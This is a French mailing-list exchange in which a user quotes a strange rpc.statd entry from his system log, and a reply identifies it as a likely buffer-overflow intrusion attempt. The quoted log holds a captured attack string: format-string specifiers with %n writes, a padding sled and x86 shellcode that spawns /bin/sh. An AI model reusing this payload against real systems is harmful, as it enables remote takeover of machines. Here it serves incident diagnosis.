Re: Log étrange...

["Julien Gilles" <jgilles@glmultimedia.com>]

Patrice Karatchentzeff <p.karatchentzeff@free.fr> writes:

> Salut,
>
> J'ai surpris dans mes log (/var/log/messages) la séquence suivante
> (attention, c'est de la poésie ) :
>
> Feb 13 08:28:35 belledonne 173>Feb 13 08:28:35 /sbin/rpc.statd[172]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????1Àë|Y?A^P?A^HþÀ?A^D?ÃþÀ?^A°fÍ?³^B?Y^LÆA^N?ÆA^H^P?I^D?A^D^L?^A°fÍ?³^D°fÍ?³^E0À?A^D°fÍ
>  Feb 13 08:28:35 belledonne
> Ç^F/binÇF^D/shA0À?F^G?v^L?V^P?N^L?ó°^KÍ?°^AÍ?èÿÿÿ
>
> J'étais connecté alors (en RTC). Quelqu'un sait-il de quoi ça en
> retourne (belledonne, c'est ma machine bien sûr) ?

Ça ressemble à un débordement de buffer dans /sbin/rpc.statd.
Il y a comme un "/bin/sh" dans la chaine, (2eme ligne des logs),
peut-être une tentative d'intrusion.
Pas très poétique...

-- 
Julien Gilles